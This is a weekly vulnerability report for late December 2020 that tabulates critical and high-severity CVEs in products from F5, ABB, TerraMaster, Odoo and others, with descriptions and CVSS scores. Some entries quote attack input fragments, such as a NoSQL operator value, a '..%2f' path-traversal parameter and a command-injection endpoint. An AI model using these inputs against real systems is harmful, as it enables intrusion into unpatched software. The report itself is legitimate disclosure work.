Weekly Vulnerabilities Reports > December 21 to 27, 2020
Overview
234 new vulnerabilities reported during this period, including 44 critical vulnerabilities and 101 high severity vulnerabilities. This weekly summary report vulnerabilities in 280 products from 124 vendors including F5, Odoo, IBM, ABB, and Terra Master. Vulnerabilities are notably categorized as "Cross-site Scripting", "SQL Injection", "OS Command Injection", "Path Traversal", and "Resource Exhaustion".
- 204 reported vulnerabilities are remotely exploitables.
- 32 reported vulnerabilities have public exploit available.
- 95 reported vulnerabilities are related to weaknesses in OWASP Top Ten.
- 157 reported vulnerabilities are exploitable by an anonymous user.
- F5 has the most reported vulnerabilities, with 16 reported vulnerabilities.
- ABB has the most reported critical vulnerabilities, with 4 reported vulnerabilities.
VULNERABILITIES
VULNERABILITIES
VULNERABILITIES
VULNERABILITIES
VULNERABILITIES
EXPLOITABLE
EXPLOITABLE
AVAILABLE
ANONYMOUSLY
WEB APPLICATION
Vulnerability Details
The following table list reported vulnerabilities for the period covered by this report:
44 Critical Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2020-12-24 | CVE-2020-26282 | Browserup | Unspecified vulnerability in Browserup Proxy BrowserUp Proxy allows you to manipulate HTTP requests and responses, capture HTTP content, and export performance data as a HAR file. | 10.0 |
2020-12-27 | CVE-2020-35729 | Klogserver | OS Command Injection vulnerability in Klogserver Klog Server 2.4.1 KLog Server 2.4.1 allows OS command injection via shell metacharacters in the actions/authenticate.php user parameter. | 9.8 |
2020-12-27 | CVE-2020-7845 | Jiransecurity | Out-of-bounds Write vulnerability in Jiransecurity Spamsniper 5.0.2/5.7.5 Spamsniper 5.0 ~ 5.2.7 contain a stack-based buffer overflow vulnerability caused by improper boundary checks when parsing MAIL FROM command. | 9.8 |
2020-12-26 | CVE-2020-35245 | Flamingo Project | SQL Injection vulnerability in Flamingo Project Flamingo 20200929 Flamingo (aka FlamingoIM) through 2020-09-29 has a SQL injection vulnerability in UserManager::addUser. | 9.8 |
2020-12-26 | CVE-2020-35244 | Flamingo Project | SQL Injection vulnerability in Flamingo Project Flamingo 20200929 Flamingo (aka FlamingoIM) through 2020-09-29 has a SQL injection vulnerability in UserManager::addGroup. | 9.8 |
2020-12-26 | CVE-2020-35243 | Flamingo Project | SQL Injection vulnerability in Flamingo Project Flamingo 20200929 Flamingo (aka FlamingoIM) through 2020-09-29 has a SQL injection vulnerability in UserManager::updateUserInfoInDb. | 9.8 |
2020-12-26 | CVE-2020-35242 | Flamingo Project | SQL Injection vulnerability in Flamingo Project Flamingo 20200929 Flamingo (aka FlamingoIM) through 2020-09-29 has a SQL injection vulnerability in UserManager::updateUserTeamInfoInDbAndMemory. | 9.8 |
2020-12-26 | CVE-2020-29203 | Struct2Json Project | Classic Buffer Overflow vulnerability in Struct2Json Project Struct2Json struct2json before 2020-11-18 is affected by a Buffer Overflow because strcpy is used for S2J_STRUCT_GET_string_ELEMENT. | 9.8 |
2020-12-26 | CVE-2020-35364 | Huorong | Unspecified vulnerability in Huorong Internet Security 5.0.55.2 Beijing Huorong Internet Security 5.0.55.2 allows a non-admin user to escalate privileges by injecting code into a process, and then waiting for a Huorong services restart or a system reboot. | 9.8 |
2020-12-26 | CVE-2020-35575 | TP Link | Unspecified vulnerability in Tp-Link products A password-disclosure issue in the web interface on certain TP-Link devices allows a remote attacker to get full administrative access to the web panel. | 9.8 |
2020-12-26 | CVE-2020-35713 | Linksys | OS Command Injection vulnerability in Linksys Re6500 Firmware Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. | 9.8 |
2020-12-26 | CVE-2020-35712 | Esri | Server-Side Request Forgery (SSRF) vulnerability in Esri Arcgis Server Esri ArcGIS Server before 10.8 is vulnerable to SSRF in some configurations. | 9.8 |
2020-12-24 | CVE-2020-29474 | Egavilanmedia | SQL Injection vulnerability in Egavilanmedia EGM Address Book 1.0 EGavilan Media EGM Address Book 1.0 contains a SQL injection vulnerability. | 9.8 |
2020-12-24 | CVE-2020-29472 | Egavilanmedia | SQL Injection vulnerability in Egavilanmedia Under Construction Page With Cpanel 1.0 EGavilan Media Under Construction page with cPanel 1.0 contains a SQL injection vulnerability. | 9.8 |
2020-12-24 | CVE-2020-28188 | Terra Master | OS Command Injection vulnerability in Terra-Master TOS Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter. | 9.8 |
2020-12-24 | CVE-2020-28187 | Terra Master | Path Traversal vulnerability in Terra-Master TOS Multiple directory traversal vulnerabilities in TerraMaster TOS <= 4.2.06 allow remote authenticated attackers to read, edit or delete any file within the filesystem via the (1) filename parameter to /tos/index.php?editor/fileGet, Event parameter to /include/ajax/logtable.php, or opt parameter to /include/core/index.php. | 9.8 |
2020-12-23 | CVE-2020-35665 | Terra Master | OS Command Injection vulnerability in Terra-Master Terramaster Operating System 3.0.33/3.1.03/4.2.06 An unauthenticated command-execution vulnerability exists in TerraMaster TOS through 4.2.06 via shell metacharacters in the Event parameter in include/makecvs.php during CSV creation. | 9.8 |
2020-12-23 | CVE-2020-28074 | Online Health Care System Project | SQL Injection vulnerability in Online Health Care System Project Online Health Care System 1.0 SourceCodester Online Health Care System 1.0 is affected by SQL Injection which allows a potential attacker to bypass the authentication system and become an admin. | 9.8 |
2020-12-23 | CVE-2020-28073 | Library Management System Project | SQL Injection vulnerability in Library Management System Project Library Management System 1.0 SourceCodester Library Management System 1.0 is affected by SQL Injection allowing an attacker to bypass the user authentication and impersonate any user on the system. | 9.8 |
2020-12-23 | CVE-2020-28070 | Alumni Management System Project | SQL Injection vulnerability in Alumni Management System Project Alumni Management System 1.0 SourceCodester Alumni Management System 1.0 is affected by SQL injection causing arbitrary remote code execution from GET input in view_event.php via the 'id' parameter. | 9.8 |
2020-12-23 | CVE-2020-13968 | CRK | SQL Injection vulnerability in CRK Business Platform 2019.1 CRK Business Platform <= 2019.1 allows can inject SQL statements against the DB on any path using the 'strSessao' parameter. | 9.8 |
2020-12-23 | CVE-2020-29552 | Urve | OS Command Injection vulnerability in Urve 24.03.2020 An issue was discovered in URVE Build 24.03.2020. | 9.8 |
2020-12-23 | CVE-2020-11720 | Bilanc | Use of Hard-coded Credentials vulnerability in Bilanc 01431.01.2020 An issue was discovered in Programi Bilanc build 007 release 014 31.01.2020 and possibly below. | 9.8 |
2020-12-23 | CVE-2020-25196 | Moxa | Improper Restriction of Excessive Authentication Attempts vulnerability in Moxa Nport Iaw5000A-I/O Firmware The built-in WEB server for MOXA NPort IAW5000A-I/O firmware version 2.1 or lower allows SSH/Telnet sessions, which may be vulnerable to brute force attacks to bypass authentication. | 9.8 |
2020-12-23 | CVE-2020-25190 | Moxa | Cleartext Transmission of Sensitive Information vulnerability in Moxa Nport Iaw5000A-I/O Firmware The built-in WEB server for MOXA NPort IAW5000A-I/O firmware version 2.1 or lower stores and transmits the credentials of third-party services in cleartext. | 9.8 |
2020-12-22 | CVE-2020-29583 | Zyxel | Insufficiently Protected Credentials vulnerability in Zyxel products Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. | 9.8 |
2020-12-22 | CVE-2020-25066 | Treck | Out-of-bounds Write vulnerability in Treck Tcp/Ip A heap-based buffer overflow in the Treck HTTP Server component before 6.0.1.68 allows remote attackers to cause a denial of service (crash/reset) or to possibly execute arbitrary code. | 9.8 |
2020-12-22 | CVE-2020-24683 | ABB | Incorrect Resource Transfer Between Spheres vulnerability in ABB Symphony + Historian and Symphony + Operations The affected versions of S+ Operations (version 2.1 SP1 and earlier) used an approach for user authentication which relies on validation at the client node (client-side authentication). | 9.8 |
2020-12-22 | CVE-2020-24679 | ABB | Improper Input Validation vulnerability in ABB Symphony + Historian and Symphony + Operations A S+ Operations and S+ Historian service is subject to a DoS by special crafted messages. | 9.8 |
2020-12-22 | CVE-2020-24675 | ABB | Improper Authentication vulnerability in ABB Symphony + Historian and Symphony + Operations In S+ Operations and S+ History, it is possible that an unauthenticated user could inject values to the Operations History server (or standalone S+ History server) and ultimately write values to the controlled process. | 9.8 |
2020-12-22 | CVE-2020-24673 | ABB | SQL Injection vulnerability in ABB Symphony + Historian and Symphony + Operations In S+ Operations and S+ Historian, a successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. | 9.8 |
2020-12-22 | CVE-2020-28448 | Multi INI Project | Unspecified vulnerability in Multi-Ini Project Multi-Ini This affects the package multi-ini before 2.1.1. | 9.8 |
2020-12-21 | CVE-2020-8995 | Bilanc | Use of Hard-coded Credentials vulnerability in Bilanc 01431.01.2020 Programi Bilanc Build 007 Release 014 31.01.2020 supplies a .exe file containing several hardcoded credentials to different servers that allow remote attackers to gain access to the complete infrastructure including the website, update server, and external issue tracking tools. | 9.8 |
2020-12-21 | CVE-2020-11717 | Bilanc | SQL Injection vulnerability in Bilanc 01431.01.2020 An issue was discovered in Programi 014 31.01.2020. | 9.8 |
2020-12-21 | CVE-2020-35605 | Kitty Project Debian | The Graphics Protocol feature in graphics.c in kitty before 0.19.3 allows remote attackers to execute arbitrary code because a filename containing special characters can be included in an error message. | 9.8 |
2020-12-21 | CVE-2020-35604 | Kronos | XXE vulnerability in Kronos web Time and Attendance 5.0.4 An XXE attack can occur in Kronos WebTA 5.0.4 when SAML is used. | 9.8 |
2020-12-21 | CVE-2020-21378 | Seacms | SQL Injection vulnerability in Seacms 10.1 SQL injection vulnerability in SeaCMS 10.1 (2020.02.08) via the id parameter in an edit action to admin_members_group.php. | 9.8 |
2020-12-21 | CVE-2020-21377 | Yunyecms | SQL Injection vulnerability in Yunyecms 2.0.1 SQL injection vulnerability in yunyecms V2.0.1 via the selcart parameter. | 9.8 |
2020-12-21 | CVE-2020-4988 | IBM | Unspecified vulnerability in IBM Loopback 8.0.0 Loopback 8.0.0 contains a vulnerability that could allow an attacker to manipulate or pollute Javascript values and cause a denial of service or possibly execute code. | 9.8 |
2020-12-21 | CVE-2020-27846 | Grafana Saml Project Redhat Fedoraproject | A signature verification vulnerability exists in crewjam/saml. | 9.8 |
2020-12-21 | CVE-2020-35276 | Egavilanmedia | SQL Injection vulnerability in Egavilanmedia ECM Address Book 1.0 EgavilanMedia ECM Address Book 1.0 is affected by SQL injection. | 9.8 |
2020-12-21 | CVE-2020-35590 | Limitloginattempts | Improper Restriction of Excessive Authentication Attempts vulnerability in Limitloginattempts Limit Login Attempts Reloaded LimitLoginAttempts.php in the limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows a bypass of (per IP address) rate limits because the X-Forwarded-For header can be forged. | 9.8 |
2020-12-23 | CVE-2020-29551 | Urve | Missing Authentication for Critical Function vulnerability in Urve 24.03.2020 An issue was discovered in URVE Build 24.03.2020. | 9.1 |
2020-12-22 | CVE-2018-15632 | Odoo | Improper Input Validation vulnerability in Odoo Improper input validation in database creation logic in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier, allows remote attackers to initialize an empty database on which they can connect with default credentials. | 9.1 |
101 High Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2020-12-26 | CVE-2020-26766 | User Registration Login AND User Management System With Admin Panel Project | Cross-Site Request Forgery (CSRF) vulnerability in User Registration & Login and User Management System With Admin Panel Project User Registration & Login and User Management System With Admin Panel 2.1 A Cross Site Request Forgery (CSRF) vulnerability exists in the loginsystem page in PHPGurukul User Registration & Login and User Management System With Admin Panel 2.1. | 8.8 |
2020-12-26 | CVE-2020-25917 | Stratodesk | Missing Authorization vulnerability in Stratodesk Notouch Center 4.1.24 Stratodesk NoTouch Center before 4.4.68 is affected by: Incorrect Access Control. | 8.8 |
2020-12-26 | CVE-2020-35715 | Linksys | OS Command Injection vulnerability in Linksys Re6500 Firmware Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote authenticated users to execute arbitrary commands via shell metacharacters in a filename to the upload_settings.cgi page. | 8.8 |
2020-12-26 | CVE-2020-35714 | Linksys | OS Command Injection vulnerability in Linksys Re6500 Firmware Belkin LINKSYS RE6500 devices before 1.0.11.001 allow remote authenticated users to execute arbitrary commands via goform/systemCommand?command= in conjunction with the goform/pingstart program. | 8.8 |
2020-12-24 | CVE-2020-35693 | Unspecified vulnerability in Google Android On some Samsung phones and tablets running Android through 7.1.1, it is possible for an attacker-controlled Bluetooth Low Energy (BLE) device to pair silently with a vulnerable target device, without any user interaction, when the target device's Bluetooth is on, and it is running an app that offers a connectable BLE advertisement. | 8.8 | |
2020-12-23 | CVE-2020-35666 | Steedos | SQL Injection vulnerability in Steedos Steedos Platform through 1.21.24 allows NoSQL injection because the /api/collection/findone implementation in server/packages/steedos_base.js mishandles req.body validation, as demonstrated by MongoDB operator attacks such as an X-User-Id[$ne]=1 value. | 8.8 |
2020-12-23 | CVE-2020-35370 | Raysync | Path Traversal vulnerability in Raysync A RCE vulnerability exists in Raysync below 3.3.3.8. | 8.8 |
2020-12-23 | CVE-2020-35269 | Nagios | Cross-Site Request Forgery (CSRF) vulnerability in Nagios Core 4.2.4 Nagios Core application version 4.2.4 is vulnerable to Site-Wide Cross-Site Request Forgery (CSRF) in many functions, like adding – deleting for hosts or servers. | 8.8 |
2020-12-23 | CVE-2020-27397 | Projectworlds | Unrestricted Upload of File with Dangerous Type vulnerability in Projectworlds Online Matrimonial Project 1.0 Marital - Online Matrimonial Project In PHP version 1.0 suffers from an authenticated file upload vulnerability allowing remote attackers to gain remote code execution (RCE) on the Hosting web server via uploading a maliciously crafted PHP file. | 8.8 |
2020-12-23 | CVE-2020-25198 | Moxa | Session Fixation vulnerability in Moxa Nport Iaw5000A-I/O Firmware The built-in WEB server for MOXA NPort IAW5000A-I/O firmware version 2.1 or lower has incorrectly implemented protections from session fixation, which may allow an attacker to gain access to a session and hijack it by stealing the user’s cookies. | 8.8 |
2020-12-23 | CVE-2020-25194 | Moxa | Improper Privilege Management vulnerability in Moxa Nport Iaw5000A-I/O Firmware The built-in WEB server for MOXA NPort IAW5000A-I/O firmware version 2.1 or lower has improper privilege management, which may allow an attacker with user privileges to perform requests with administrative privileges. | 8.8 |
2020-12-22 | CVE-2020-24678 | ABB | Unspecified vulnerability in ABB Symphony + Historian and Symphony + Operations An authenticated user might execute malicious code under the user context and take control of the system. | 8.8 |
2020-12-22 | CVE-2020-24677 | ABB | Improper Check for Unusual or Exceptional Conditions vulnerability in ABB Symphony + Historian and Symphony + Operations Vulnerabilities in the S+ Operations and S+ Historian web applications can lead to a possible code execution and privilege escalation, redirect the user somewhere else or download unwanted data. | 8.8 |
2020-12-22 | CVE-2020-24674 | ABB | Incorrect Authorization vulnerability in ABB Symphony + Historian and Symphony + Operations In S+ Operations and S+ Historian, not all client commands correctly check user permission as expected. | 8.8 |
2020-12-22 | CVE-2020-14231 | Hcltechsw | Out-of-bounds Write vulnerability in Hcltechsw HCL Client Application Access 9.0 A vulnerability in the input parameter handling of HCL Client Application Access v9 could potentially be exploited by an authenticated attacker resulting in a stack buffer overflow. | 8.8 |
2020-12-22 | CVE-2020-24579 | Dlink | Improper Authentication vulnerability in Dlink Dsl2888A Firmware An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. | 8.8 |
2020-12-22 | CVE-2020-13547 | Foxitsoftware | Type Confusion vulnerability in Foxitsoftware Foxit Reader 10.0.0.37527 A type confusion vulnerability exists in the JavaScript engine of Foxit Software’s Foxit PDF Reader, version 10.1.0.37527. | 8.8 |
2020-12-22 | CVE-2020-13570 | Foxitsoftware | Use After Free vulnerability in Foxitsoftware Foxit Reader 10.1.0.37527 A use-after-free vulnerability exists in the JavaScript engine of Foxit Software’s PDF Reader, version 10.1.0.37527. | 8.8 |
2020-12-22 | CVE-2020-13560 | Foxitsoftware | Use After Free vulnerability in Foxitsoftware Foxit Reader 10.1.0.37527 A use after free vulnerability exists in the JavaScript engine of Foxit Software’s Foxit PDF Reader, version 10.1.0.37527. | 8.8 |
2020-12-22 | CVE-2020-13557 | Foxitsoftware | Use After Free vulnerability in Foxitsoftware Foxit Reader 10.1.0.37527 A use after free vulnerability exists in the JavaScript engine of Foxit Software’s Foxit PDF Reader, version 10.1.0.37527. | 8.8 |
2020-12-22 | CVE-2020-29396 | Odoo | Unspecified vulnerability in Odoo 11.0/12.0/13.0 A sandboxing issue in Odoo Community 11.0 through 13.0 and Odoo Enterprise 11.0 through 13.0, when running with Python 3.6 or later, allows remote authenticated users to execute arbitrary code, leading to privilege escalation. | 8.8 |
2020-12-22 | CVE-2019-11781 | Odoo | Improper Input Validation vulnerability in Odoo Improper input validation in portal component in Odoo Community 12.0 and earlier and Odoo Enterprise 12.0 and earlier, allows remote attackers to trick victims into modifying their account via crafted links, leading to privilege escalation. | 8.8 |
2020-12-21 | CVE-2020-35626 | Mediawiki | Cross-Site Request Forgery (CSRF) vulnerability in Mediawiki An issue was discovered in the PushToWatch extension for MediaWiki through 1.35.1. | 8.8 |
2020-12-21 | CVE-2020-35625 | Mediawiki | Missing Authorization vulnerability in Mediawiki An issue was discovered in the Widgets extension for MediaWiki through 1.35.1. | 8.8 |
2020-12-21 | CVE-2020-35151 | Phpgurukul | SQL Injection vulnerability in PHPgurukul Online Marriage Registration System 1.0 The Online Marriage Registration System 1.0 post parameter "searchdata" in the user/search.php request is vulnerable to Time Based Sql Injection. | 8.8 |
2020-12-21 | CVE-2020-35606 | Webmin | OS Command Injection vulnerability in Webmin Arbitrary command execution can occur in Webmin through 1.962. | 8.8 |
2020-12-21 | CVE-2020-26284 | Gohugo | OS Command Injection vulnerability in Gohugo Hugo Hugo is a fast and Flexible Static Site Generator built in Go. | 8.5 |
2020-12-27 | CVE-2020-35728 | Fasterxml Debian Netapp Oracle | Deserialization of Untrusted Data vulnerability in multiple products FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl). | 8.1 |
2020-12-24 | CVE-2020-29189 | Terra Master | Unspecified vulnerability in Terra-Master TOS Incorrect Access Control vulnerability in TerraMaster TOS <= 4.2.06 allows remote authenticated attackers to bypass read-only restriction and obtain full access to any folder within the NAS | 8.1 |
2020-12-22 | CVE-2020-28460 | Multi INI Project | Unspecified vulnerability in Multi-Ini Project Multi-Ini This affects the package multi-ini before 2.1.2. | 8.1 |
2020-12-22 | CVE-2020-24581 | Dlink | OS Command Injection vulnerability in Dlink Dsl2888A Firmware An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. | 8.0 |
2020-12-21 | CVE-2020-35273 | Egavilanmedia | Cross-Site Request Forgery (CSRF) vulnerability in Egavilanmedia User Registration & Login System With Admin Panel 1.0 EgavilanMedia User Registration & Login System with Admin Panel 1.0 is affected by Cross Site Request Forgery (CSRF) to remotely gain privileges in the User Profile panel. | 8.0 |
2020-12-27 | CVE-2020-8290 | Backblaze | Improper Privilege Management vulnerability in Backblaze Backblaze for Windows and Backblaze for macOS before 7.0.0.439 suffer from improper privilege management in `bztransmit` helper due to lack of permission handling and validation before creation of client update directories allowing for local escalation of privilege via rogue client update binary. | 7.8 |
2020-12-27 | CVE-2020-8289 | Backblaze | Improper Certificate Validation vulnerability in Backblaze 7.0.0.439 Backblaze for Windows before 7.0.1.433 and Backblaze for macOS before 7.0.1.434 suffer from improper certificate validation in `bztransmit` helper due to hardcoded whitelist of strings in URLs where validation is disabled leading to possible remote code execution via client update functionality. | 7.8 |
2020-12-25 | CVE-2020-35702 | Freedesktop | Out-of-bounds Write vulnerability in Freedesktop Poppler 20.12.1 DCTStream::getChars in DCTStream.cc in Poppler 20.12.1 has a heap-based buffer overflow via a crafted PDF document. | 7.8 |
2020-12-24 | CVE-2020-24658 | ARM | Allocation of Resources Without Limits or Throttling vulnerability in ARM Compiler Arm Compiler 5 through 5.06u6 has an error in a stack protection feature designed to help spot stack-based buffer overflows in local arrays. | 7.8 |
2020-12-24 | CVE-2020-9200 | Huawei | Improper Neutralization of Formula Elements in a CSV File vulnerability in Huawei Imanager Neteco 6000 V600R021C00 There has a CSV injection vulnerability in iManager NetEco 6000 versions V600R021C00. | 7.8 |
2020-12-24 | CVE-2020-5681 | Epson | Uncontrolled Search Path Element vulnerability in Epson products Untrusted search path vulnerability in self-extracting files created by EpsonNet SetupManager versions 2.2.14 and earlier, and Offirio SynergyWare PrintDirector versions 1.6x/1.6y and earlier allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. | 7.8 |
2020-12-22 | CVE-2020-24676 | ABB | Unspecified vulnerability in ABB Symphony + Historian and Symphony + Operations In Symphony Plus Operations and Symphony Plus Historian, some services can be vulnerable to privilege escalation attacks. | 7.8 |
2020-12-22 | CVE-2020-35608 | Microsoft | Injection vulnerability in Microsoft Azure Sphere 20.07 A code execution vulnerability exists in the normal world’s signed code execution functionality of Microsoft Azure Sphere 20.07. | 7.8 |
2020-12-22 | CVE-2020-25106 | Supremocontrol | Improper Privilege Management vulnerability in Supremocontrol Supremo 4.1.3.2348 Nanosystems SupRemo 4.1.3.2348 allows attackers to obtain LocalSystem access because File Manager can be used to rename Supremo.exe and then upload a Trojan horse with the Supremo.exe filename. | 7.8 |
2020-12-21 | CVE-2020-17526 | Apache | Unspecified vulnerability in Apache Airflow Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. | 7.7 |
2020-12-27 | CVE-2020-35736 | Liftoffsoftware | Path Traversal vulnerability in Liftoffsoftware Gateone 1.1 GateOne 1.1 allows arbitrary file download without authentication via /downloads/.. | 7.5 |
2020-12-26 | CVE-2020-35362 | Dext5 | Path Traversal vulnerability in Dext5 Dext5Upload 2.7.1262310 DEXT5Upload 2.7.1262310 and earlier is affected by Directory Traversal in handler/dext5handler.jsp. | 7.5 |
2020-12-26 | CVE-2020-35284 | Flamingoim Project | Path Traversal vulnerability in Flamingoim Project Flamingoim 20200929 Flamingo (aka FlamingoIM) through 2020-09-29 allows ../ directory traversal because the only ostensibly unpredictable part of a file-transfer request is an MD5 computation; however, this computation occurs on the client side, and the computation details can be easily determined because the product's source code is available. | 7.5 |
2020-12-26 | CVE-2020-35450 | Gobby Project | NULL Pointer Dereference vulnerability in Gobby Project Gobby 0.4.11 Gobby 0.4.11 allows a NULL pointer dereference in the D-Bus handler for certain set_language calls. | 7.5 |
2020-12-26 | CVE-2020-35359 | Pureftpd | Allocation of Resources Without Limits or Throttling vulnerability in Pureftpd Pure-Ftpd 1.0.48 Pure-FTPd 1.0.48 allows remote attackers to prevent legitimate server use by making enough connections to exceed the connection limit. | 7.5 |
2020-12-26 | CVE-2020-35376 | Xpdfreader Fedoraproject | Out-of-bounds Write vulnerability in multiple products Xpdf 4.02 allows stack consumption because of an incorrect subroutine reference in a Type 1C font charstring, related to the FoFiType1C::getOp() function. | 7.5 |
2020-12-26 | CVE-2020-35388 | Rockoa | Unspecified vulnerability in Rockoa Xinhu 2.1.9 rainrocka xinhu 2.1.9 allows remote attackers to obtain sensitive information via an index.php?a=gettotal request in which the ajaxbool value is manipulated to be true. | 7.5 |
2020-12-26 | CVE-2020-35716 | Linksys | Unspecified vulnerability in Linksys Re6500 Firmware Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to cause a persistent denial of service (segmentation fault) via a long /goform/langSwitch langSelectionOnly parameter. | 7.5 |
2020-12-25 | CVE-2020-35711 | ARC Swap Project | Unspecified vulnerability in Arc-Swap Project Arc-Swap An issue has been discovered in the arc-swap crate before 0.4.8 (and 1.x before 1.1.0) for Rust. | 7.5 |
2020-12-24 | CVE-2020-11093 | Linuxfoundation | Unspecified vulnerability in Linuxfoundation Indy-Node Hyperledger Indy Node is the server portion of a distributed ledger purpose-built for decentralized identity. | 7.5 |
2020-12-24 | CVE-2020-9120 | Huawei | Unspecified vulnerability in Huawei Cloudengine 1800V V100R019C10Spc500 CloudEngine 1800V versions V100R019C10SPC500 has a resource management error vulnerability. | 7.5 |
2020-12-24 | CVE-2020-35680 | Opensmtpd Fedoraproject | NULL Pointer Dereference vulnerability in multiple products smtpd/lka_filter.c in OpenSMTPD before 6.8.0p1, in certain configurations, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted pattern of client activity, because the filter state machine does not properly maintain the I/O channel between the SMTP engine and the filters layer. | 7.5 |
2020-12-24 | CVE-2020-35679 | Opensmtpd Fedoraproject | Memory Leak vulnerability in multiple products smtpd/table.c in OpenSMTPD before 6.8.0p1 lacks a certain regfree, which might allow attackers to trigger a "very significant" memory leak via messages to an instance that performs many regex lookups. | 7.5 |
2020-12-24 | CVE-2020-27728 | F5 | Unspecified vulnerability in F5 products On BIG-IP ASM & Advanced WAF versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, and 14.1.0-14.1.3, under certain conditions, Analytics, Visibility, and Reporting daemon (AVRD) may generate a core file and restart on the BIG-IP system when processing requests sent from mobile devices. | 7.5 |
2020-12-24 | CVE-2020-27723 | F5 | Unspecified vulnerability in F5 Big-Ip Access Policy Manager In versions 14.1.0-14.1.3 and 13.1.0-13.1.3.4, a BIG-IP APM virtual server processing PingAccess requests may lead to a restart of the Traffic Management Microkernel (TMM) process. | 7.5 |
2020-12-24 | CVE-2020-27720 | F5 | Unspecified vulnerability in F5 Big-Ip Local Traffic Manager On BIG-IP LTM/CGNAT version 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, and 13.1.0-13.1.3.5, when processing NAT66 traffic with Port Block Allocation (PBA) mode and SP-DAG enabled, and dag-ipv6-prefix-len configured with a value less than the default of 128, an undisclosed traffic pattern may cause the Traffic Management Microkernel (TMM) to restart. | 7.5 |
2020-12-24 | CVE-2020-27717 | F5 | Unspecified vulnerability in F5 Big-Ip Domain Name System On BIG-IP DNS 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, and 12.1.0-12.1.5.2, undisclosed series of DNS requests may cause TMM to restart and generate a core file. | 7.5 |
2020-12-24 | CVE-2020-27716 | F5 | Unspecified vulnerability in F5 Big-Ip Access Policy Manager On versions 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.5, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, when a BIG-IP APM virtual server processes traffic of an undisclosed nature, the Traffic Management Microkernel (TMM) stops responding and restarts. | 7.5 |
2020-12-24 | CVE-2020-27715 | F5 | Unspecified vulnerability in F5 products On BIG-IP 15.1.0-15.1.0.5 and 14.1.0-14.1.3, crafted TLS request to the BIG-IP management interface via port 443 can cause high (~100%) CPU utilization by the httpd daemon. | 7.5 |
2020-12-24 | CVE-2020-27714 | F5 | Unspecified vulnerability in F5 Big-Ip Advanced Firewall Manager On the BIG-IP AFM version 15.1.0-15.1.0.5, 14.1.0-14.1.3, and 13.1.0-13.1.3.5, when a Protocol Inspection Profile is attached to a FastL4 virtual server with the protocol field configured to either Other or All Protocols, the TMM may experience a restart if the profile processes non-TCP traffic. | 7.5 |
2020-12-24 | CVE-2020-27721 | F5 | Unspecified vulnerability in F5 products In versions 16.0.0-16.0.0.1, 15.1.0-15.1.1, 14.1.0-14.1.3, 13.1.0-13.1.3.5, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, in a BIG-IP DNS / BIG-IP LTM GSLB deployment, under certain circumstances, the BIG-IP DNS system may stop using a BIG-IP LTM virtual server for DNS response. | 7.5 |
2020-12-24 | CVE-2020-27718 | F5 | Unspecified vulnerability in F5 products When a BIG-IP ASM or Advanced WAF system running version 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, or 11.6.1-11.6.5.2 processes requests with JSON payload, an unusually large number of parameters can cause excessive CPU usage in the BIG-IP ASM bd process. | 7.5 |
2020-12-24 | CVE-2020-2504 | Qnap | Path Traversal vulnerability in Qnap QES If exploited, this absolute path traversal vulnerability could allow attackers to traverse files in File Station. | 7.5 |
2020-12-23 | CVE-2020-35668 | Redislabs | NULL Pointer Dereference vulnerability in Redislabs Redisgraph RedisGraph 2.x through 2.2.11 has a NULL Pointer Dereference that leads to a server crash because it mishandles an unquoted string, such as an alias that has not yet been introduced. | 7.5 |
2020-12-23 | CVE-2020-35598 | Advanced Comment System Project | Path Traversal vulnerability in Advanced Comment System Project Advanced Comment System 1.0 ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI. | 7.5 |
2020-12-23 | CVE-2020-11719 | Bilanc | Use of Hard-coded Credentials vulnerability in Bilanc 01431.01.2020 An issue was discovered in Programi Bilanc build 007 release 014 31.01.2020 and possibly below. | 7.5 |
2020-12-23 | CVE-2018-1000893 | Bitcoinsv | Resource Exhaustion vulnerability in Bitcoinsv Bitcoin SV Bitcoin SV before 0.1.1 allows uncontrolled resource consumption when deserializing transactions. | 7.5 |
2020-12-23 | CVE-2018-1000892 | Bitcoinsv | Resource Exhaustion vulnerability in Bitcoinsv Bitcoin SV Bitcoin SV before 0.1.1 allows uncontrolled resource consumption when receiving sendheaders messages. | 7.5 |
2020-12-23 | CVE-2018-1000891 | Bitcoinsv | Resource Exhaustion vulnerability in Bitcoinsv Bitcoin SV Bitcoin SV before 0.1.1 allows uncontrolled resource consumption when receiving messages with invalid checksums. | 7.5 |
